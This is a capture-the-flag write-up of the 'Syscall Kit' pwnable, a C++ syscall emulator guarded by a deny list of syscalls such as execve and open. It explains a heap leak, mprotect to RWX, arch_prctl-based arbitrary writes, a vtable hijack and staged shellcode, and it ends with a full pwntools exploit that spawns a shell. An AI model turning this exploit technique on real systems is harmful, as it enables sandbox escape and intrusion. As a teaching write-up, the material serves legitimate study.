Post

Syscall Kit

Syscall Kit

zer0pts 2020 - Syscall Kit

Overview

Syscall Kit is a hard rated pwnable challenge created by ptr-yudai.

It is simply an emulator written in C++ that’s used to execute user-provided system calls.

There are some restrictions however, and our goal is to pop shell from this somewhat restricted sandbox.

You can download the challenge attachments here

Analysis

The challenge just contains two files:

  • chall
  • main.cpp

Here are the protections enabled on the binary.

1
2
3
4
5
6
7
8
9
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/SyscallKit$ checksec chall
[*] '/home/mark/Desktop/Practice/BinExp/Challs/STACK/SyscallKit/chall'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/SyscallKit$ 

When we run the program, we are asked to give it a syscall and it’s argument.

one

In this case, I used the exit syscall whose sys_num == 60, and from the return value we can see it infact does what it says.

Since we are given the source code, we don’t have to reverse engineer the binary.

Here’s the source:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
/**
 * syscall kit - WinterKosenCTF 2020
 *
 * This application is (maybe) made for educational purpose
 * and for those who learn system calls.
 */
#include <iostream>
#include <sys/syscall.h>

class Emulator {
private:
  unsigned long rax;
  unsigned long rdi;
  unsigned long rsi;
  unsigned long rdx;
  virtual void set(std::string, unsigned long&);
  virtual int check();
  virtual void syscall();
public:
  Emulator();
  virtual void emulate();
};

/**
 * Constructor
 */
Emulator::Emulator() {
  this->rax = 0;
  this->rdi = 0;
  this->rsi = 0;
  this->rdx = 0;
}

/**
 * Read system call number and arguments
 */
void Emulator::set(std::string msg, unsigned long &reg) {
  std::cout << msg;
  std::cin >> reg;
  if (!std::cin.good()) exit(1);
}

/**
 * Filter dangerous system calls
 */
int Emulator::check() {
  if (this->rax >= 0x40000000)   return 1; // x32 ABI is dangerous!
  if (this->rax == SYS_open)     return 1; // never open files
  if (this->rax == SYS_openat)   return 1;
  if (this->rax == SYS_write)    return 1; // no more leak
  if (this->rax == SYS_read)     return 1; // no more overwrite
  if (this->rax == SYS_sendfile) return 1;
  if (this->rax == SYS_execve)   return 1; // of course not!
  if (this->rax == SYS_execveat) return 1;
  if (this->rax == SYS_ptrace)   return 1; // may ruine the program
  if (this->rax == SYS_fork)     return 1;
  if (this->rax == SYS_vfork)    return 1;
  if (this->rax == SYS_clone)    return 1;
  return 0;
}

/**
 * Call syscall
 */
void Emulator::syscall() {
  asm volatile ("movq %0, %%rdi":: "a"(this->rdi));
  asm volatile ("movq %0, %%rsi":: "a"(this->rsi));
  asm volatile ("movq %0, %%rdx":: "a"(this->rdx));
  asm volatile ("movq %0, %%rax":: "a"(this->rax));
  asm volatile ("syscall");
  asm volatile ("movq %%rax, %0": "=a"(this->rax));
}

/**
 * Run emulator
 */
void Emulator::emulate(void)
{
  int i;
  for(i = 0; i < 10; i++) {
    std::cout << "=========================" << std::endl;
    this->set("syscall: ", this->rax);
    this->set("arg1: ", this->rdi);
    this->set("arg2: ", this->rsi);
    this->set("arg3: ", this->rdx);
    
    std::cout << "=========================" << std::endl;
    
    if (this->check()) {
      std::cerr << "syscall=" << this->rax << " is not allowed" << std::endl;
      continue;
    } else {
      this->syscall();
      std::cout << "retval: " << std::hex << this->rax << std::endl;
    }
  }

  std::cout << "Bye!" << std::endl;
}

Emulator *m;

void setup(void)
{
  std::setbuf(stdin, NULL);
  std::setbuf(stdout, NULL);
  std::setbuf(stderr, NULL);

  m = new Emulator();
}

int main(void)
{
  setup();
  m->emulate();
  exit(0);
}

The code is small, but I’ll walk through each section.

First, there is a class named Emulator. It contains four private attributes representing the x86_64 system call calling convention registers, along with four virtual methods and 1 public virtual method.

1
2
3
4
5
6
7
8
9
10
11
12
13
class Emulator {
private:
  unsigned long rax;
  unsigned long rdi;
  unsigned long rsi;
  unsigned long rdx;
  virtual void set(std::string, unsigned long&);
  virtual int check();
  virtual void syscall();
public:
  Emulator();
  virtual void emulate();
};

This is the constructor. It simply initializes all of the object’s register fields to zero:

1
2
3
4
5
6
Emulator::Emulator() {
  this->rax = 0;
  this->rdi = 0;
  this->rsi = 0;
  this->rdx = 0;
}

The main function first initializes the object then calls the emulate method:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void setup(void)
{
  std::setbuf(stdin, NULL);
  std::setbuf(stdout, NULL);
  std::setbuf(stderr, NULL);

  Emulator *m = new Emulator();
}

int main(void)
{
  setup();
  m->emulate();
  exit(0);
}

The emulate method runs for 10 iterations. On each iteration, it sets the object’s register fields using Emulator::set.

After the registers are set, it then goes ahead to call Emulator::check, if the return value is true it would simply continue else it calls Emulator::syscall.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
void Emulator::emulate(void)
{
  int i;
  for(i = 0; i < 10; i++) {
    std::cout << "=========================" << std::endl;
    this->set("syscall: ", this->rax);
    this->set("arg1: ", this->rdi);
    this->set("arg2: ", this->rsi);
    this->set("arg3: ", this->rdx);
    
    std::cout << "=========================" << std::endl;
    
    if (this->check()) {
      std::cerr << "syscall=" << this->rax << " is not allowed" << std::endl;
      continue;
    } else {
      this->syscall();
      std::cout << "retval: " << std::hex << this->rax << std::endl;
    }
  }

  std::cout << "Bye!" << std::endl;
}

void Emulator::set(std::string msg, unsigned long &reg) {
  std::cout << msg;
  std::cin >> reg;
  if (!std::cin.good()) exit(1);
}

Our main point of interest is Emulator::check:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int Emulator::check() {
  if (this->rax >= 0x40000000)   return 1; // x32 ABI is dangerous!
  if (this->rax == SYS_open)     return 1; // never open files
  if (this->rax == SYS_openat)   return 1;
  if (this->rax == SYS_write)    return 1; // no more leak
  if (this->rax == SYS_read)     return 1; // no more overwrite
  if (this->rax == SYS_sendfile) return 1;
  if (this->rax == SYS_execve)   return 1; // of course not!
  if (this->rax == SYS_execveat) return 1;
  if (this->rax == SYS_ptrace)   return 1; // may ruine the program
  if (this->rax == SYS_fork)     return 1;
  if (this->rax == SYS_vfork)    return 1;
  if (this->rax == SYS_clone)    return 1;
  return 0;
}

This method prevents the use of specific system calls, as well as any syscall value that falls into the x32 ABI range.

Conceptually, it behaves like a simple seccomp filter. If the syscall number in rax matches one of the blocked syscalls, check() returns 1, meaning the syscall should be rejected. This is similar to a seccomp rule using SCMP_ACT_KILL_PROCESS, where attempting to execute a blocked syscall causes the process to be terminated.

As expected, Emulator::syscall uses inline assembly to load the CPU registers with the values stored in the object, then executes the syscall instruction.

After the syscall runs, its return value is placed in rax, and that value is then written back into the object’s rax field.

The return value is also printed (as shown in the src code).

1
2
3
4
5
6
7
8
void Emulator::syscall() {
  asm volatile ("movq %0, %%rdi":: "a"(this->rdi));
  asm volatile ("movq %0, %%rsi":: "a"(this->rsi));
  asm volatile ("movq %0, %%rdx":: "a"(this->rdx));
  asm volatile ("movq %0, %%rax":: "a"(this->rax));
  asm volatile ("syscall");
  asm volatile ("movq %%rax, %0": "=a"(this->rax));
}

Exploitation

What’s the vulnerability?

Well, there actually isn’t any vulnerability

The challenge description says this:

1
It's a good tool to learn syscall, isn't it?

So we somehow need to leverage this emulator to trigger a syscall that would eventually spawn a shell.

Looking at the setup, we can only control 3 argument of the syscall of our choosing.

At the same time, it blocks so many syscalls that we could’ve easily used to gain a shell.

I’m going to be using this linux kernel syscall table as a reference

As of the latest kernel version (v6.17) there are 365 syscalls.

Does it mean we need to go through all the syscalls (354) not blocked by the emulator?

Not necessarily…

The approach I took was to actually parse all the syscalls based on the number of argument it takes.

There’s a json export of the syscall table here

I wrote a script to parse all the syscalls I can use that makes use of only 3 or lesser arguments.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import json

NUMBER = [0, 1, 2, 0x101, 0x28, 0x3b, 0x142, 0x65, 0x39, 0x3a, 0x38]
TABLE = "table.json"

with open(TABLE, "r") as f:
    dataset = json.load(f)

syscalls = dataset["syscalls"]
output = {
    "syscall": []
}

for syscall in syscalls:
    if (len(syscall["signature"]) <= 3) and (syscall["number"] not in NUMBER):
        output["syscall"].append(syscall)

# print(len(output["syscall"]))
print(json.dumps(output))

Although doing that only just reduces the potential syscall we can make use of to 236.

It’s still a lot.

two

I was thinking of spawning a local instance of the syscall table since it’s open source but that’s just a lot of work and tbf as of 2020 it never existed.

Luckily the UI is awesome, it has a view where we can see the arguments needed.

three

My goal still remained the same, check out the syscalls that uses less or equal to 3 number of arguments.

Here are the syscalls I found interesting to check:

1
2
3
4
5
6
int brk(void *addr);
int mprotect(unsigned long start, size_t len, unsigned long prot);
ssize_t readv(int fd, const struct iovec *iov, int iovcnt);
ssize_t writev(int fd, const struct iovec *iov, int iovcnt);
int syscall(SYS_arch_prctl, int op, unsigned long addr);
// ....

Firstly, we need to make our goal clear. Our goal is to gain $rip control.

What possible way can this be achieved?

One way would be a virtual function table (vtable) hijack.

C++ is an object oriented programming language.

Virtual functions is a key mechanism to support polymorphism in C++.

For each class with virtual functions, depending on the class inheritance hierarchy, the compiler will create one or more associated virtual function table (vtable).

Looking at the object’s initialization, we can see that the Emulator instance is allocated on the heap:

1
2
3
4
5
6
7
8
void setup(void)
{
  std::setbuf(stdin, NULL);
  std::setbuf(stdout, NULL);
  std::setbuf(stderr, NULL);

  m = new Emulator();
}

Here’s the heap layout after initialization:

four

gef> emu_dump 0x5555556162b0
====== Emulator @ 0x5555556162b0 ======
[+] vtable            : 0x555555602ce0
[+] virtual functions
    [0] -> 0x555555401114
    [1] -> 0x55555540116e
    [2] -> 0x555555401290
    [3] -> 0x5555554012d8
===============================

This is the gdb script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
define emu_dump
    set $base = (char *)$arg0

    printf "====== Emulator @ %p ======\n", $base

    set $vtable = *(void **)$base
    printf "[+] vtable            : %p\n", $vtable

    printf "[+] virtual functions\n"

    set $i = 0
    while $i < 4
        set $fn = *(void **)($vtable + ($i * 8))
        printf "    [%d] -> %p\n", $i, $fn
        set $i = $i + 1
    end

    printf "===============================\n"
end

Because the vtable pointer itself resides in a heap-allocated object, it becomes a writable target.

If we can forge the vtable, then any subsequent virtual method call on the object would dereference our fake vtable and jump to our controlled function pointer instead.

But before we perform a write, we need to know the location of the heap.

Reading the man page for brk

man1

1
Calling sbrk() with an increment of 0 can be used to find the current location of the program break.

The program break marks the point where the heap currently ends in the process’s virtual address space.

Here’s the helper function I wrote:

1
2
3
4
5
6
7
8
def syscall(sys_num, rdi=0, rsi=0, rdx=0):
    io.sendlineafter(b"syscall:", str(sys_num).encode())
    io.sendlineafter(b"arg1:", str(rdi).encode())
    io.sendlineafter(b"arg2:", str(rsi).encode())
    io.sendlineafter(b"arg3:", str(rdx).encode())
    io.recvuntil(b"retval: ")
    ret = int(io.recvline(), 16)
    return ret

We can leak the heap address by doing this:

1
2
3
4
PAGE = 0x21000
brk  = 0xc
heap_base = syscall(brk, 0) - PAGE
info("heap base: %#x", heap_base)

If you think about it, we now have the heap address, but we still don’t really know anywhere in memory (e.g libc) and to corrupt a vtable we need a form of arbitrary write primitive.

The reason we would need a libc leak is to be able to call functions like system or a one gadget, but that would require us to create an arbitrary read.

In essence, increasing the number of syscalls we can make, remember we can only do it 10 times.

A way around that is to change the heap protection to (PROT_READ | PROT_WRITE | PROT_EXEC) making the heap region RWX.

1
2
mprotect    = 0xa
syscall(mprotect, heap_base, PAGE, 0x7)

With that we can simply just jump to the heap and get shellcode execution going.

But now how do we corrupt the vtable?

This was where the issue began!

While going through the syscalls, I found an interesting system call called arch_prctl.

man2 man3

1
2
int syscall(SYS_arch_prctl, int op, unsigned long addr);
int syscall(SYS_arch_prctl, int op, unsigned long *addr);

It says:

  • when we use ARCH_SET_FS subfunction that we are able to set the 64-bit base for the FS register to addr
  • while the ARCH_GET_FS returns the 64-bit base value for the FS register of the calling thread and stores it in memory pointer by addr

The same goes for the GS register

Incase you don’t know what the FS register is, they’re segment registers, but on modern 64-bit systems they’re mostly used for thread and CPU-local data.

You can check it out here

The important thing however is that this gives us a form of arbitrary write.

We can quickly test it out:

1
2
3
arch_prctl  = 0x9e
syscall(arch_prctl, ARCH_SET_FS, 0x414141414141)
syscall(arch_prctl, ARCH_GET_FS, vtable_addr)
gdb1
Before updating $fs_base
gdb2
After updating $fs_base

At this point, we’ve corrupt the fs_base register.

But once the program returns to Emulator::emulate it crashes

gdb2
Crashed

This makes sense, because the fs register is constantly referenced during program execution (e.g reading the stack canary fs:0x28).

Now this forces us to write only valid addresses into memory, which slightly constrains the primitive.

However, this isn’t a major obstacle because we can now overwrite the object’s vtable pointer itself.

But how to gain $rip from this?

Here’s what I initially did.

If you’ve noticed, the third syscall argument is not actually used by the emulator / by the syscall, but we fully control its value. That makes it a convenient place to stage data.

So the idea is to construct a fake object layout like this:

1
2
*(uintptr_t*)fake_obj = &this->arg3;
this->vtable = &fake_obj;

With this setup, when Emulator::set triggers a virtual call, execution will dereference the corrupted vtable, jump into our fake vtable, and then invoke the first function pointer.

That function pointer resolves to this->arg3, which we control directly.

Since we’ve placed our staged shellcode, we are therefore able to execute shellocde, the restriction with this is that we can only use 8 bytes shellcode.

Here’s a sample:

1
2
3
4
5
6
7
8
9
10
arch_prctl  = 0x9e
emu_obj = heap_base + 0x122b0
vtable_addr = heap_base + 0x200
vtable  = emu_obj + 0x20

syscall(arch_prctl, ARCH_SET_FS, vtable)
syscall(arch_prctl, ARCH_GET_FS, vtable_addr)

syscall(arch_prctl, ARCH_SET_FS, vtable_addr)
syscall(arch_prctl, ARCH_GET_FS, emu_obj, 0x9090909090909090)
gdb4
Faked vtable

The method Emulator::set is called back at Emulator::emulate:

1
this->set("syscall: ", this->rax);

This is the register state at the point of the program executing our shellcode.

gdb5 gdb6

Ideally, we would want to create a staged shellcode (i.e do read syscall)

1
ssize_t read(int fd, void buf[.count], size_t count)

Reason is because we can’t exactly do much with just 8 bytes.

For a staged execution we can use the initial control flow to trigger a second-stage payload that lives elsewhere (e.g. heap), then jump into that.

We only need to control 4 registers (rax, rdi, rsi, rdx).

In our case, all registers are populated by the emulator’s calling convention, which makes clean syscall setup difficult.

This was the shortest shellcode I could come up with.

1
2
3
4
5
xor eax, eax
mov edi, eax
mov rsi, [rsp+0x10]
shr edx, 0x1
syscall

It requires 13 bytes which is too much.

sc

What now?

I decided to check the second subfunction (writing to GS)

It behaves in a similar way however it doesn’t require that we pass in a valid address to it.

gdb7
Before updating $gs_base
gdb8
After updating $gs_base
gdb9
Arbitarry write successful

This is good, because recall that our shellcode was 13 bytes, with only 8 bytes fully controllable, we’re left with 5 bytes.

With this arbitary write, we can place the remaning bytes to (uint8_t*)&this->arg3 + 8.

Actually, I did notice a thing with writing to the segment registers.

It can only store up to a certain value.

Checking the kernel source code for the syscall handler do_arch_prctl_64

kernel

If the value we want to write is greater than TASK_SIZE_MAX it returns EPERM

1
#define	EPERM		 1	/* Operation not permitted */

Cross-referencing this, we end up at the following kernel trace:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define TASK_SIZE_MAX		task_size_max()

static __always_inline unsigned long task_size_max(void)
{
	unsigned long ret;

	alternative_io("movq %[small],%0","movq %[large],%0",
			X86_FEATURE_LA57,
			"=r" (ret),
			[small] "i" ((1ul << 47)-PAGE_SIZE),
			[large] "i" ((1ul << 56)-PAGE_SIZE));

	return ret;
}

#define X86_FEATURE_LA57		(16*32+16) /* "la57" 5-level page tables */

All this is doing is defining the maximum user-space virtual address range. In other words, it sets the upper boundary of valid user-mode addresses, ensuring we can’t map or use pointers outside of user space.

Anyways, our 5 byte left has enough bit to fit into this range.

Here’s the final solve:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

exe = context.binary = ELF('chall')

context.terminal = ['gnome-terminal', '--maximize', '-e']
context.log_level = 'info'

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE: 
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

gdbscript = '''
brva 0x12C4 
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

def init():
    global io

    io = start()

def syscall(sys_num, rdi=0, rsi=0, rdx=0):
    io.sendlineafter(b"syscall:", str(sys_num).encode())
    io.sendlineafter(b"arg1:", str(rdi).encode())
    io.sendlineafter(b"arg2:", str(rsi).encode())
    io.sendlineafter(b"arg3:", str(rdx).encode())
    io.recvuntil(b"retval: ")
    ret = int(io.recvline(), 16)
    return ret

def solve():

    brk         = 0xc
    mprotect    = 0xa
    arch_prctl  = 0x9e

    ARCH_SET_GS = 0x1001
    ARCH_SET_FS = 0x1002
    ARCH_GET_FS = 0x1003
    ARCH_GET_GS = 0x1004
    PAGE        = 0x21000
    
    pack = lambda data: int.from_bytes(data, byteorder='little')

    heap_base = syscall(brk, 0) - PAGE
    info("heap base: %#x", heap_base)

    emu_obj = heap_base + 0x122b0
    vtable_addr = heap_base + 0x200
    vtable  = emu_obj + 0x20

    syscall(mprotect, heap_base, PAGE, 0x7)

    syscall(arch_prctl, ARCH_SET_FS, vtable)
    syscall(arch_prctl, ARCH_GET_FS, vtable_addr)

    sc = asm(
        """
        sc:
            xor eax, eax
            mov edi, eax
            mov rsi, [rsp+0x10]
            shr edx, 0x1
            syscall
        """
    )

    cont = sc[8:]

    syscall(arch_prctl, ARCH_SET_GS, pack(cont))
    syscall(arch_prctl, ARCH_GET_GS, emu_obj + 0x28)

    syscall(arch_prctl, ARCH_SET_FS, vtable_addr)
    syscall(arch_prctl, ARCH_GET_FS, emu_obj, u64(sc[:8]))

    payload  = asm("nop") * 0x100
    payload += asm(shellcraft.sh())

    io.send(payload)

    io.interactive()

def main():
    
    init()
    solve()
    
if __name__ == '__main__':
    main()

Running it works!

done

Resources

This post is licensed under CC BY 4.0 by the author.